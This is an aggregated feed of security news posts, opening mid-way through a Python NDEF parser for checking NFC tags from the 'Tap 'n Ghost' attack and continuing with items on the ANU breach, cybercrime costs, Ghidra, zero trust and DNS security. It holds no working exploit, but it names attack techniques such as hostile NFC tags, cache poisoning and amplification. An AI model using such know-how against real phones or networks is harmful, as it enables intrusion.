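        payload = message[off:off + payload_len]; off += payload_len
        records.append((tnf, rtype, payload))
        if hdr & FLAG_ME:                               # ME: last record of the message
            break
    return records


def uri_from_record(tnf: int, rtype: bytes, payload: bytes) -> Optional[str]:
    """Return the URI carried by a well-known 'U' record, or None for any other record."""
    if tnf != TNF_WELL_KNOWN or rtype != b"U" or not payload:
        return None
    return URI_PREFIXES.get(payload[0], "") + payload[1:].decode("utf-8")


def auto_open_uris(message: bytes) -> List[str]:
    """URIs that an unlocked Android phone would pass straight to the browser.

    Assumption (from the article): http/https URI records are opened without a prompt,
    while tel:/mailto: and non-URI records are not.
    """
    found = []
    for tnf, rtype, payload in decode_ndef(message):
        uri = uri_from_record(tnf, rtype, payload)
        if uri and uri.startswith(("http://", "https://")):
            found.append(uri)
    return found


if __name__ == "__main__":
    # Constructed sample: the kind of URL a rigged table's NFC writer might present.
    tag = encode_uri_record("https://example.com/pair")
    print(tag.hex())
    print(auto_open_uris(tag))
```

Dumping a real tag with a reader and feeding the raw bytes to `auto_open_uris` is the quick check for whether a tag found in the wild would redirect a phone. Note that the parser stops at the first record with ME set and does not handle chunked (CF=1) records, which a hostile tag could use to confuse a naive reader.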

At the time of this writing, the following mainstream Android devices from Sony, Sharp, HTC, Asus, Fujitsu, and Samsung were known to be vulnerable:

  • Xperia Z4
  • Galaxy S6 Edge
  • Galaxy S4
  • Aquos Zeta SH-04F
  • Nexus 9
  • Arrows NX F005-F
  • Nexus 7

It is not yet known whether current NFC devices on the market are also affected, but the three researchers noted that the false-touch weakness may well exist on newer devices, since the NFC protocols remain the same across generations of devices. The IEEE Symposium on Security and Privacy shared a video detailing the exact components of the Tap ‘n Ghost device, how it operates, and the basics of the snooping process against NFC devices.

This weakness may one day prompt smartphone vendors to ship their phones with NFC disabled by default. Disabled-by-default behavior would also benefit Android users, since the device would not need to spend energy powering the NFC component when the user does not currently need it.


The post NFC Vulnerability May Promote Ghost Screen Taps appeared first on .

ANU Cyber Breach, Students and Staff’s Personal Data Stolen

Personal data of nearly 200,000 students and staff members of the Australian National University (ANU) was stolen in a “sophisticated” cyber-attack. It follows a similar breach of the university’s systems last year.

The university admitted that the hackers stole data dating back 19 years, including banking information, passport information, and past and current academic and personal records.

Vice-chancellor Brian Schmidt said the university was working with government security agencies to investigate the breach, which occurred in late 2018 and was detected two weeks ago.

“We believe there was unauthorized access to significant amounts of personal staff, student and visitor data extending back 19 years,” Professor Schmidt said in a letter to students and staff.

“Depending on the information you have provided to the university, this may include names, addresses, dates of birth, phone numbers, personal email addresses, and emergency contact details, tax file numbers, payroll information, bank account details, and passport details. Student academic records were also accessed.”

There was “no evidence” that research work had been affected, Professor Schmidt said.

A university spokesperson estimated the number of people affected at 200,000, based on annual student numbers and staff turnover.

Stephen Lockstep, an information security analyst at Constellation Research, questioned why the ANU was keeping so many years’ worth of data in systems that were connected to the internet. “Assuming that some of the 19-year-old data is for long-gone ANU students and staff, why does anyone at the university need ready online access to such old data?” he said.

Authorities said it was too early to say who was behind the attack, or whether it was linked to a separate violation of the university’s systems more than a year ago.

Education Minister Dan Tehan has announced that he will invite the country’s vice-chancellors to a briefing with the Australian government’s cybersecurity center to ensure that they are up to date on cybersecurity.

“Universities have a responsibility to protect the information they hold about individuals and the research they are conducting,” he said.

The ANU is considered an attractive destination because of its close ties to the Australian Government. Many students continue to work in the federal government, and many government officials, including military personnel, complete part-time career education at the university.

According to sources, by stealing staff and student data the hackers can build long-term profiles of people who go on to hold critical positions in the Canberra bureaucracy.

A spokesman for the electronic spy agency, the Australian Signals Directorate, confirmed the agency was working to “secure the networks, protect users and investigate the full extent of the compromise”.


The post ANU Cyber Breach, Students and Staff’s Personal Data Stolen appeared first on .

Advancing transparency and accountability in the cybersecurity industry

NSS Labs, the Texas-based company that specializes in testing the world’s security products, has a new CEO. Jason Brvenik, the company’s CTO since early 2017, took over the role from Vikram Phatak, the company’s founder. But, as Brvenik told Help Net Security, the company’s strategic priorities remain unchanged: their mission is to advance transparency and accountability in the cybersecurity industry. “If you look at the dollars being spent to improve cyber protections versus the dollars … More

The post Advancing transparency and accountability in the cybersecurity industry appeared first on Help Net Security.

Embrace chaos to improve cloud infrastructure resilience

Netflix is a champion of using chaos engineering to improve the resilience of its cloud infrastructure. That’s how it ensures its customers don’t have their Stranger Things binge watching sessions interrupted. Netflix is one of a growing number of companies including Nike, Amazon and Microsoft that leverage chaos engineering as a means of stress testing their cloud infrastructures against a variety of unpredictable cloud events, such as a loss of cloud resources or entire regions. … More

The post Embrace chaos to improve cloud infrastructure resilience appeared first on Help Net Security.

2018 in numbers: Data breaches cost $654 billion, expose 2.8 billion data records in the U.S.

Cybercriminals exposed 2.8 billion consumer data records in 2018, costing over $654 billion to U.S. organizations, according to ForgeRock. Cyberattacks to U.S. financial services organizations cost the industry over $6.2 billion in Q1 2019 alone, up from just $8 million in Q1 2018. Even though investments in information security products and services have been on the rise, with $114 billion invested in 2018, cybercriminals continue to attack organizations across a wide spectrum of industries to … More

The post 2018 in numbers: Data breaches cost $654 billion, expose 2.8 billion data records in the U.S. appeared first on Help Net Security.

Despite disclosure laws, cybercrime may be widely underreported

While attack vectors remain largely the same year over year, attack volume will increase and cybercrime may be vastly underreported, according to the 2019 State of Cybersecurity Study from global IT and cybersecurity association ISACA. “Underreporting cybercrime – even when disclosure is legally mandated – appears to be the norm, which is a significant concern,” said Greg Touhill, Brigadier General (ret), ISACA Board Director, president of Cyxtera Federal and the first US Federal CISO. “Half … More

The post Despite disclosure laws, cybercrime may be widely underreported appeared first on Help Net Security.

Unclassified data creates security blind spots for most companies

Global businesses continue to house ‘dark data’ within their organizations, creating a honeypot for cybercriminals, finds research from Veritas Technologies. The value of data The Value of Data study, conducted by Vanson Bourne for Veritas, surveyed 1,500 IT decision makers and data managers across 15 countries. It reveals that on average, over half (52 percent) of all data within organizations remains unclassified or untagged, indicating that businesses have limited or no visibility over vast volumes … More

The post Unclassified data creates security blind spots for most companies appeared first on Help Net Security.

The Cost of Cybercrime

Really interesting paper calculating the worldwide cost of cybercrime:

Abstract: In 2012 we presented the first systematic study of the costs of cybercrime. In this paper, we report what has changed in the seven years since. The period has seen major platform evolution, with the mobile phone replacing the PC and laptop as the consumer terminal of choice, with Android replacing Windows, and with many services moving to the cloud. The use of social networks has become extremely widespread. The executive summary is that about half of all property crime, by volume and by value, is now online. We hypothesised in 2012 that this might be so; it is now established by multiple victimisation studies. Many cybercrime patterns appear to be fairly stable, but there are some interesting changes. Payment fraud, for example, has more than doubled in value but has fallen slightly as a proportion of payment value; the payment system has simply become bigger, and slightly more efficient. Several new cybercrimes are significant enough to mention, including business email compromise and crimes involving cryptocurrencies. The move to the cloud means that system misconfiguration may now be responsible for as many breaches as phishing. Some companies have suffered large losses as a side-effect of denial-of-service worms released by state actors, such as NotPetya; we have to take a view on whether they count as cybercrime. The infrastructure supporting cybercrime, such as botnets, continues to evolve, and specific crimes such as premium-rate phone scams have evolved some interesting variants. The over-all picture is the same as in 2012: traditional offences that are now technically 'computer crimes' such as tax and welfare fraud cost the typical citizen in the low hundreds of Euros/dollars a year; payment frauds and similar offences, where the modus operandi has been completely changed by computers, cost in the tens; while the new computer crimes cost in the tens of cents.
Defending against the platforms used to support the latter two types of crime cost citizens in the tens of dollars. Our conclusions remain broadly the same as in 2012: it would be economically rational to spend less in anticipation of cybercrime (on antivirus, firewalls, etc.) and more on response. We are particularly bad at prosecuting criminals who operate infrastructure that other wrongdoers exploit. Given the growing realisation among policymakers that crime hasn't been falling over the past decade, merely moving online, we might reasonably hope for better funded and coordinated law-enforcement action.

Richard Clayton gave a presentation on this yesterday at WEIS. His final slide contained a summary.

  • Payment fraud is up, but credit card sales are up even more -- so we're winning.

  • Cryptocurrencies are enabling new scams, but the big money is still being lost in more traditional investment fraud.

  • Telecom fraud is down, basically because Skype is free.

  • Anti-virus fraud has almost disappeared, but tech support scams are growing very rapidly.

  • The big money is still in tax fraud, welfare fraud, VAT fraud, and so on.

  • We spend more money on cyber defense than we do on the actual losses.

  • Criminals largely act with impunity. They don't believe they will get caught, and mostly that's correct.

Bottom line: the technology has changed a lot since 2012, but the economic considerations remain unchanged.

Is AI fundamental to the future of cybersecurity?

While a significant proportion of SMEs believe in their current approach to security, they are struggling when it comes to allocation of budget, according to a Senseon research project. There is increasing uncertainty on whether the investment into the security solutions they’re currently using is worth the cost. The survey also reveals that SMEs have been slow to implement AI solutions, despite the vast majority of SMEs surveyed (81 percent) thinking that AI will be … More

The post Is AI fundamental to the future of cybersecurity? appeared first on Help Net Security.

How organizations are managing vulnerability risks

Tripwire evaluated how organizations are managing vulnerability risks and found that more than one in four (27 percent) globally have been breached as a result of unpatched vulnerabilities, with an even higher rate in Europe (34 percent). Vulnerability management starts with visibility of the attack surface, and Tripwire’s report found that 59 percent of global organizations are able to detect new hardware and software on their networks within minutes or hours. However, this is a … More

The post How organizations are managing vulnerability risks appeared first on Help Net Security.

Ghidra, A Powerful Cybersecurity Tool By NSA

While NSA cybersecurity adviser Rob Joyce called the tool a “contribution to the nation’s cybersecurity community” when announcing it at RSA, it will no doubt be used far beyond the United States.

Ghidra is not a tool that lets you hack a device. It is a reverse engineering platform used to take compiled, deployed software and decompile it. In other words, it turns ones and zeros into a human-readable form, making it easier to understand what a piece of software does and what impact it has. Reverse engineering is an important process for malware analysts and threat intelligence researchers because it lets them work with software found in the wild, such as malware used to carry out attacks, to understand how it works, what capabilities it has, and who wrote it or where it came from. Reverse engineering is also an important way for defenders to check their own code for vulnerabilities and make sure it functions as intended.

“If you’ve done software reverse engineering, what you’ve found out is it’s both art and science; there’s not a hard path from the beginning to the end,” Joyce said. “Ghidra is a software reverse-engineering tool built for our internal use at NSA. We’re not claiming that this is the one that’s going to be replacing everything out there—it’s not. But it helped us address some things in our workflow.”

That said, reverse engineering products were already on the market, notably the well-known IDA disassembler and debugger. But Joyce says the NSA has been developing Ghidra for years, guided by its own priorities and real-world needs, which has made it a powerful and very useful tool. Products like IDA also cost money, whereas Ghidra is open source and free, which makes it an important contribution to training the next generation of cybersecurity defenders. (As with any other open source code, expect some bugs.) Joyce also noted that the NSA saw releasing Ghidra as a recruiting strategy: new hires can arrive already familiar with the tool, and cleared contractors can lend their expertise without having to learn it first.

The NSA announced in early January that Joyce would present Ghidra at RSA. The tool’s existence was already public knowledge, however, thanks to WikiLeaks’ “Vault 7” release in March 2017, which described a number of hacking tools used by the CIA and repeatedly referenced Ghidra as a reverse engineering tool built by the NSA. The code itself, some 1.2 million lines of it, was released on Tuesday. Ghidra runs on Windows, macOS and Linux and includes the components security researchers expect from such a platform. Joyce, however, emphasized how customizable the tool is. It was also built to support collaboration between several people working on the same reversing project, something that is not common on other platforms.

Ghidra also has a user interface and features designed to make reversing as painless as possible given how complex and time-consuming it is. Joyce’s favorite feature is the undo/redo mechanism, which lets users test theories about what the code being analyzed does. If an idea doesn’t pan out, you can easily step back a few moves.

Over the years the NSA has released other open source code, such as Security-Enhanced Linux and the Security-Enhanced Android initiative. But Ghidra speaks more directly to the discourse and tension at the heart of cybersecurity today. Because it is free, it may spread and inform both defense and offense in unexpected ways. Though it might seem that releasing the tool could give attackers an edge by showing them how to evade the NSA, even Dave Aitel, a former NSA researcher who is now at security infrastructure company Cyxtera, said that is not a concern.

“Malware authors already know how to make it annoying to reverse their code,” Aitel said. “There’s really no downside” to releasing Ghidra.

No matter what comes next for the NSA’s powerful reversing tool, it is an earnest contribution to the community of cybersecurity defenders, and conspiracy theorists can rest easy. “There’s no backdoor in Ghidra,” Joyce said on Tuesday.


The post Ghidra, A Powerful Cybersecurity Tool By NSA appeared first on .

Cisco Security & Trust at Cisco Live US

At Cisco, cybersecurity is our top priority; from product development, to operations, to data protection and privacy, we are embedding security everywhere. Our journey starts with protecting the Cisco enterprise. We invite you to learn more about how we securely enable business for our customers, partners, and ourselves at Cisco Live US, taking place June 9th through the 13th in San Diego, CA.

The sessions listed below will help participants build a more secure network foundation for their enterprise. Specific topics to be covered include, among others:

  • Trustworthy solutions
  • Security analytics
  • Threat intelligence
  • Cloud security
  • Endpoint protection
  • Secure access
  • Data protection and privacy
  • Privacy engineering

Attacks on Network Infrastructure: Protecting Network Integrity with Cisco Trustworthy Tech | David Lapier, Sr. Technical Leader of Software Engineering | Monday, June 10th, 1-2 PM

Understanding Encrypted Traffic Using Joy for Monitoring and Forensics | Bill Hudson, Sr. Technical Leader of Software Engineering | Tuesday, June 11th, 3-3:45 PM

Securely Enabling Your Organization | Steve Martino, Chief Information Security Officer | Wednesday, June 12th, 11-11:40 AM

Inside Cisco IT: How to Move to the Cloud | David Jones, Information Technology Architect & Jason Freeth, Information Security Architect | Wednesday, June 12th, 4-5:30 PM

Privacy by Design | Lisa Bobbitt, Data Privacy Architect, Jonathan Fox, Data Privacy Director, & Mike Tibodeau, Data Protection & Privacy Operations Manager | Thursday, June 13th, 9:30-11:30 AM

Join us for world-class technical and cybersecurity training and enjoy the fun social activities in store.

The post Cisco Security & Trust at Cisco Live US appeared first on Cisco Blog.

The Importance of Protecting Cybersecurity Whistleblowers

Interesting essay arguing that we need better legislation to protect cybersecurity whistleblowers.

Congress should act to protect cybersecurity whistleblowers because information security has never been so important, or so challenging. In the wake of a barrage of shocking revelations about data breaches and companies' mishandling of customer data, a bipartisan consensus has emerged in support of legislation to give consumers more control over their personal information, require companies to disclose how they collect and use consumer data, and impose penalties for data breaches and misuse of consumer data. The Federal Trade Commission ("FTC") has been held out as the best agency to implement this new regulation. But for any such legislation to be effective, it must protect the courageous whistleblowers who risk their careers to expose data breaches and unauthorized use of consumers' private data.

Whistleblowers strengthen regulatory regimes, and cybersecurity regulation would be no exception. Republican and Democratic leaders from the executive and legislative branches have extolled the virtues of whistleblowers. High-profile cases abound. Recently, Christopher Wylie exposed Cambridge Analytica's misuse of Facebook user data to manipulate voters, including its apparent theft of data from 50 million Facebook users as part of a psychological profiling campaign. Though additional research is needed, the existing empirical data reinforces the consensus that whistleblowers help prevent, detect, and remedy misconduct. Therefore it is reasonable to conclude that protecting and incentivizing whistleblowers could help the government address the many complex challenges facing our nation's information systems.

Zero Trust Architecture and its Relevance in Cybersecurity

In the world of technology, just as in any other sphere of life, things that were once in vogue have become outdated, and things that are the trend today would soon go out of use. This naturally applies to cybersecurity as well.

Cybersecurity is an area that evolves much faster than many other domains in the world of technology. This is partly because existing technologies are constantly being updated with new versions or replaced with newer ones. It is also partly because cybersecurity firms and experts have to stay ahead of cybercriminals, who are constantly coming up with newer and more sophisticated kinds of threats and attacks.

Today let’s discuss a rather new technology that has replaced the widely used and very popular Default Allow approach to cybersecurity. The new technology, the Zero Trust architecture, is now becoming quite popular among modern-day enterprises. Let’s examine different aspects of this development and also discuss the relevance of the rapidly evolving Zero Trust architecture.

What’s the issue with Default Allow?

The Default Allow approach to cybersecurity, which was deemed highly effective, works by allowing unknown files and apps to access enterprise networks. The negative aspect of Default Allow is that cybercriminals could exploit it as a fast, easy way to penetrate enterprise networks and then execute malware attacks and data breaches. They could go for Zero Day attacks or ransomware attacks and cause enterprises huge losses. It’s here that Zero Trust architecture gains relevance.

Zero Trust architecture: what is it?

Zero Trust architecture is, as the name itself suggests, all about not trusting anything that comes into a network. Thus, the IT team works on the assumption that all files and apps are dangerous as long as they are not verified. Hence, they employ a set of security systems and software throughout the network, spanning the web, the cloud, the LAN, the endpoints etc., to ensure that every single file or application is safe.

How does it work?

As already mentioned, the basic underlying principle here is that of zero trust. Everything needs to be verified before being allowed to execute in a network…

Thus, today we have a wide range of Endpoint Protection platforms that help enterprises achieve a Zero Trust architecture by never trusting and always verifying all unknown files. All unknown files that are executed on an endpoint are instantly placed in a container, thereby ensuring uninterrupted service and zero damage to the user. The unknown files in containment are all analyzed statically and dynamically, in the cloud as well as by human experts. After analysis, verdicts are given: 95 percent of verdicts are returned in under 45 seconds, while for the remaining 5 percent it might take up to 4 hours. The files are then handled accordingly: those found to be safe are let in and those that are unsafe are blocked. To be noted is the fact that files for which a 100 percent safe verdict cannot be given by cloud analysis within 45 seconds are immediately escalated to a human analyst, who reviews them to determine whether they are safe or malicious. The highlight is that neither productivity nor user experience is impacted, as the analysis process happens without being perceived and users can immediately run files and applications while they are contained and analyzed in the cloud.
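The contain-then-verify flow just described, as an added example that is not code from the original article or from any endpoint protection product. The file hashes, timings and verdicts are constructed; the 45-second cloud window and the 4-hour analyst ceiling are the figures quoted above, and the Default Allow function is included only to contrast the two postures.

```python
"""Default Allow vs Zero Trust decision logic for unknown files.

Added example, not code from the original article or any vendor product.
Hashes, timestamps and verdicts are constructed for illustration.
"""
from dataclasses import dataclass, field
from enum import Enum

CLOUD_VERDICT_DEADLINE_S = 45          # the article's 45-second cloud window
HUMAN_VERDICT_DEADLINE_S = 4 * 3600    # up to 4 hours for a human analyst


class Decision(Enum):
    ALLOW = "allow"        # known good: runs normally
    BLOCK = "block"        # known bad: never runs
    CONTAIN = "contain"    # unknown: runs inside a container while analysed
    ESCALATE = "escalate"  # no 100% verdict within 45 s: still contained, analyst review


@dataclass
class PendingAnalysis:
    submitted_at: float
    escalated: bool = False


@dataclass
class ZeroTrustPolicy:
    """Never trust, always verify: only a verdict moves a hash out of containment."""
    known_good: set = field(default_factory=set)
    known_bad: set = field(default_factory=set)
    pending: dict = field(default_factory=dict)   # hash -> PendingAnalysis

    def decide(self, file_hash: str, now: float) -> Decision:
        """Decision for one execution attempt of file_hash at time `now` (seconds)."""
        if file_hash in self.known_good:
            return Decision.ALLOW
        if file_hash in self.known_bad:
            return Decision.BLOCK
        entry = self.pending.get(file_hash)
        if entry is None:
            # First sight of an unknown file: contain it and start cloud analysis.
            self.pending[file_hash] = PendingAnalysis(submitted_at=now)
            return Decision.CONTAIN
        if entry.escalated:
            return Decision.ESCALATE
        if now - entry.submitted_at > CLOUD_VERDICT_DEADLINE_S:
            # Cloud analysis gave no definitive verdict in 45 s: hand off to a
            # human analyst. The file stays contained in the meantime.
            entry.escalated = True
            return Decision.ESCALATE
        return Decision.CONTAIN

    def record_verdict(self, file_hash: str, safe: bool) -> None:
        """Apply a cloud or analyst verdict; later decisions are final for this hash."""
        self.pending.pop(file_hash, None)
        (self.known_good if safe else self.known_bad).add(file_hash)

    def overdue(self, now: float) -> list:
        """Escalated hashes whose analyst review exceeded the 4-hour ceiling (alerting)."""
        return sorted(h for h, e in self.pending.items()
                      if e.escalated and now - e.submitted_at > HUMAN_VERDICT_DEADLINE_S)


def default_allow_decide(policy: ZeroTrustPolicy, file_hash: str) -> Decision:
    """The legacy posture the article criticises: anything not known bad runs unconfined."""
    return Decision.BLOCK if file_hash in policy.known_bad else Decision.ALLOW


if __name__ == "__main__":
    # Constructed walk-through: an unknown hash seen at t=0, 30, 50 and after a verdict.
    policy = ZeroTrustPolicy(known_bad={"sha256:constructed-known-bad"})
    unknown = "sha256:constructed-unknown"
    print("default allow :", default_allow_decide(policy, unknown).value)
    for t in (0.0, 30.0, 50.0):
        print(f"zero trust t={t:>4}:", policy.decide(unknown, t).value)
    policy.record_verdict(unknown, safe=True)
    print("after verdict :", policy.decide(unknown, 60.0).value)
```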

The relevance of a Zero Trust architecture

We have always maintained that the human element is of utmost importance in cybersecurity. Every single employee who is part of a corporate network is responsible for the overall security of the network. Still, errors are bound to happen. One or another employee might by chance click on a link or download an attachment in a phishing email, and that one click or one stray download might pave the way for a devastating cyberattack, sometimes a ransomware strike that could cripple the entire network. This, we’d like to mention, is not underestimating the importance of the human element in cybersecurity. It’s just that it’s only human to err, but one single error thus committed could cost a business organization dearly. To err is human, but then, as regards cybersecurity, there’s no point in consoling ourselves by stating that to forgive is divine, because sometimes the damage done to businesses as a result of small human errors is irreversible.

Similarly, it wouldn’t be proper to trust the IT teams to detect every threat. Their systems too could sometimes fail. We do point out time and again that all security systems have or develop flaws that could be exploited before they are found and fixed.

Thus, it’s important, not just important but highly relevant, that business enterprises seek to empower their workforces, their networks and their IT teams with the Zero Trust mindsets and the architecture that’s needed to support it. The cyberattacks that could happen as a result of depending wholly on Default Allow could have disastrous consequences and hence we need to go for the Zero Trust architecture, for better protection and data security.

The post Zero Trust Architecture and its Relevance in Cybersecurity appeared first on .

Scientists uncover vulnerability in FPGAs, affecting cloud services and IoT

Field-programmable gate arrays (FPGAs) are, so to say, a computer manufacturer’s “Lego bricks”: electronic components that can be employed in a more flexible way than other computer chips. Even large data centers that are dedicated to cloud services, such as those provided by some big technology companies, often resort to FPGAs. To date, the use of such services has been considered as relatively secure. Recently, however, scientists at Karlsruhe Institute of Technology (KIT) uncovered potential … More

The post Scientists uncover vulnerability in FPGAs, affecting cloud services and IoT appeared first on Help Net Security.

How likely are weaponized cars?

It is easy to become absorbed by the exaggerated Hollywood depictions of car hacking scenarios – to imagine a not-so-distant future when cars or their supporting infrastructures are hacked by criminals or terrorists and turned into lethal weapons. There are reasons why such a scenario has not happened yet. But could it? And if so, how can we prevent it? Some might argue that the likelihood of cars being weaponized is extremely low, but from … More

The post How likely are weaponized cars? appeared first on Help Net Security.

Why zero trust is crucial to compliance

The enterprise faces a brand new world when it comes to data privacy and security. New regulations like the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA) have joined PCI-DSS, HIPAA, and more than 25,000 other cybersecurity regulations passed since 2008. Together, these regulations have vastly increased the workload on security teams already stretched thin by the sheer scale and complexity of modern software business services. The challenge posed by these … More

The post Why zero trust is crucial to compliance appeared first on Help Net Security.

Cloud migration journey is more complex than anticipated for innovation and efficiency

Two-thirds of large enterprises are not realizing the full benefits of their cloud migration journeys identifying security and the complexity of business and operational change as barriers, according to Accenture. Based on a survey of 200 senior IT professionals from large businesses worldwide, the report — “Perspectives on Cloud Outcomes: Expectation vs. Reality” — suggests that the cloud migration journey is more complex than anticipated for innovation and efficiency. While the vast majority of companies … More

The post Cloud migration journey is more complex than anticipated for innovation and efficiency appeared first on Help Net Security.

Discussing Different Aspects of Next-Level Network Security

Cybersecurity, as an industry, is changing and evolving at a rapid pace. As cybercriminals come up with all kinds of new approaches to target and breach computer networks, it’s becoming increasingly difficult to protect systems and networks, even with DNS security technologies.

Today, we have moved much ahead in the cybersecurity industry and we have started using next-generation firewalls to ensure comprehensive security. At this juncture, it would be highly relevant to discuss DNS security.

As we know, DNS security helps individual users and organizations ensure better overall security while on the internet. DNS traffic is almost always permitted to pass through all kinds of firewalls. Cybercriminals, who are always on the lookout for security holes, are only too happy to make use of the point of exposure that DNS infrastructure provides. They come up with different kinds of exploits targeting DNS, in addition to denial of service attacks. These include exploits like cache poisoning and amplification attacks. Thus, it becomes increasingly important that ISPs (Internet Service Providers) and cloud providers take concrete steps to ensure better and more comprehensive DNS security.

ISPs today need to focus on two critical areas in their network: the DNS caching servers and the authoritative DNS servers. They must focus on protecting these two critical areas from cyberattacks.

Today, when ISPs come up with different kinds of innovative package offers and data allowances to lure subscribers, and when there is increasing client demand for bandwidth as well as applications, the cloud is seen as the best answer to such rising demands. ISPs, while incorporating and centralizing services on the cloud, seek to bring greater agility by embracing server virtualization technologies and also using them on cloud management platforms. Thus, when things are moving to the cloud, to the virtual space, it calls for a different kind of thinking and implementation. There needs to be a dynamic change as regards providing and ensuring visibility, control and manageability of different network capacities as ISPs take to the cloud.

The kind of network automation solution that we need today must be dynamic as regards the capabilities offered. We should have solutions that take care of DNS security in the first place, plus advanced IP address management. There needs to be greater visibility into virtual machines and network administrators should have a good view of and into the cloud assets that they are to deal with. Similarly, there needs to be a fast deployment of applications and better adaptability.

Let’s now discuss certain aspects pertaining to the management of DNS services in this rather dynamic and much-changed scenario, when organizations are moving their public authoritative DNS services to cloud providers’ managed DNS services…

Firstly, organizations need to ensure that their DNS infrastructure is redundant, because the failure of non-redundant DNS servers could have a big impact on the business.

Secondly, if an organization serves a worldwide user base from authoritative DNS servers in a single location, it would be ideal to depend on a cloud provider with geographically distributed DNS servers for high availability and resilience. This is because resolvers around the globe would otherwise face added latency, as they are distant from the location that answers their queries.

Thirdly, it’s best for organizations to adopt DNSSEC (Domain Name System Security Extensions), which provides a cryptographic strategy for verifying DNS records, thereby providing better DNS security.

And finally, for organizations that depend on cloud providers, it would be rather easy to absorb and mitigate the effects of DDoS attacks on their DNS infrastructure. Cloud providers have a greater capacity to scale up under DDoS attacks, whereas for a single organization it is not cost-effective to deploy the highly scalable DNS infrastructure needed to absorb such an attack. Cloud providers, on the other hand, have higher bandwidth plus more assets, and the capacity to scale their resources based on transaction volume to counter such attacks.
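The four recommendations above, turned into an offline audit over a snapshot of a zone's records; this is an added example, not the article's code or any provider's tooling. The zone snapshots, owner names and addresses are constructed (documentation ranges), the DNSKEY/RRSIG payloads are placeholders, and the fourth point, DDoS absorption capacity, is a property of the hosting provider that a zone file cannot show.

```python
"""Offline audit of an authoritative zone snapshot for redundancy,
network/provider diversity and DNSSEC signing.

Added example, not code from the original article. Zone data below is
constructed, uses RFC 5737 / RFC 2606 documentation names and addresses,
and is simplified to one record per line in presentation format.
"""
import ipaddress

# Constructed snapshot: two name servers in one /24, same operator, no DNSSEC.
WEAK_ZONE = """\
example.test.      3600 IN NS ns1.example.test.
example.test.      3600 IN NS ns2.example.test.
ns1.example.test.  3600 IN A  192.0.2.10
ns2.example.test.  3600 IN A  192.0.2.11
"""

# Constructed snapshot after hardening: a third server at a separate
# provider on a different network, plus DNSKEY and an RRSIG over the NS set.
HARDENED_ZONE = """\
example.test.          3600 IN NS     ns1.example.test.
example.test.          3600 IN NS     ns2.example.test.
example.test.          3600 IN NS     ns3.dns-provider.test.
ns1.example.test.      3600 IN A      192.0.2.10
ns2.example.test.      3600 IN A      192.0.2.11
ns3.dns-provider.test. 3600 IN A      198.51.100.53
example.test.          3600 IN DNSKEY 257 3 13 CONSTRUCTED-KSK-PLACEHOLDER
example.test.          3600 IN RRSIG  NS 13 2 3600 CONSTRUCTED-SIGNATURE-PLACEHOLDER
"""


def parse_zone(text):
    """Yield (owner, rtype, rdata_fields) from one-record-per-line zone text."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0].startswith(";"):
            continue
        owner, _ttl, _cls, rtype, *rdata = parts
        yield owner.lower(), rtype.upper(), rdata


def provider_of(nsname):
    """Registrable-domain approximation: the last two labels of the NS hostname."""
    labels = nsname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def audit_zone(text, apex):
    """Return findings for the zone; a False value is a gap to close."""
    apex = apex.lower()
    ns_names, glue, dnskeys, rrsig_types = [], {}, 0, set()
    for owner, rtype, rdata in parse_zone(text):
        if rtype == "NS" and owner == apex:
            ns_names.append(rdata[0].lower())
        elif rtype in ("A", "AAAA"):
            glue[owner] = rdata[0]
        elif rtype == "DNSKEY" and owner == apex:
            dnskeys += 1
        elif rtype == "RRSIG" and owner == apex:
            rrsig_types.add(rdata[0].upper())   # first field: type covered

    # 1. Redundancy: at least two authoritative servers.
    redundant = len(ns_names) >= 2

    # 2. Diversity: glue addresses should not all share one /24 (IPv4) or
    #    /48 (IPv6), and the servers should ideally sit with more than one provider.
    networks = set()
    for name in ns_names:
        addr = glue.get(name)
        if addr:
            prefix = 24 if ipaddress.ip_address(addr).version == 4 else 48
            networks.add(ipaddress.ip_network(f"{addr}/{prefix}", strict=False))
    network_diverse = len(networks) >= 2
    provider_diverse = len({provider_of(n) for n in ns_names}) >= 2

    # 3. DNSSEC: the apex publishes keys and the NS set itself is signed.
    dnssec_signed = dnskeys > 0 and "NS" in rrsig_types

    return {
        "ns_count": len(ns_names),
        "redundant": redundant,
        "network_diverse": network_diverse,
        "provider_diverse": provider_diverse,
        "dnssec_signed": dnssec_signed,
    }


if __name__ == "__main__":
    for label, zone in (("weak", WEAK_ZONE), ("hardened", HARDENED_ZONE)):
        print(label, audit_zone(zone, "example.test."))
```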

The post Discussing Different Aspects of Next-Level Network Security appeared first on .

Corporate IT Security Starts With Simple Policies

Frequent readers of hackercombat.com should be fully aware by now that cybercriminals of all sizes mean serious business. The old days of script kiddies vandalizing a website or pulling off a publicity stunt for their 15 minutes of online fame are a rare occurrence these days. Cybercriminals are enticed by the real plausibility of profiting from their operations; there is money to be made from the data stored in any company's database. Cybercrime tends to increase in intensity and sophistication, especially if the victim is a prime target. Spear phishing, deliberate virus infections, infiltration, and corporate/industrial espionage are regular campaigns, most especially if the cybercriminals are funded by a nation-state, as we sometimes report here on hackercombat.com.

So what can a company do to mitigate the risks, and formulate mitigations without banning BYOD (Bring Your Own Device), which is highly productive for employees, or disabling the Internet connection for IoT (Internet-of-Things) devices? As any network administrator worth his salt will tell you, the more uniform the devices connected to the corporate network, the smaller the attack surface. Of course, it is no longer possible to ban personal smartphones in the workplace, given that leaders and the management team of companies use their personal devices for business as well. The IT team just has to find an alternative way to secure the enterprise network without enforcing cut-throat restrictions all over the place in the name of security.

There is no 100% security, and even we here at hackercombat.com can never claim that 100% security is achievable. In this article, we provide a list of tips on how to increase corporate security that are easy to implement and won't break the bank:

Define computers that do not require an Internet connection

Not all computers in the enterprise require an Internet connection; in fact, some computers that perform critical 24/7 tasks do not require a network connection at all. These machines run specific applications and produce a specific deliverable that is critical for the organization. There should be a regular audit of which computers fall into this category, to determine whether they require a connection or should remain air-gapped for the rest of the cycle.

Build and keep an updated inventory

Having an up-to-date inventory provides a good baseline for determining the best IT policy and which restrictions can be enforced that will be acceptable to everyone. With good knowledge of the inventory, problematic equipment can easily be identified, quarantined and, if necessary, removed from the network (in case of malware infection).

Empower the leadership team with cybersecurity awareness

The leadership team, including the company’s board of directors and the rest of the staff members below them, should all be aware of cybersecurity risks. As the leadership team formulates corporate-level decisions, one wrong decision may cause a troubled brand and long term damaged customer confidence.

Be transparent with IT security policy

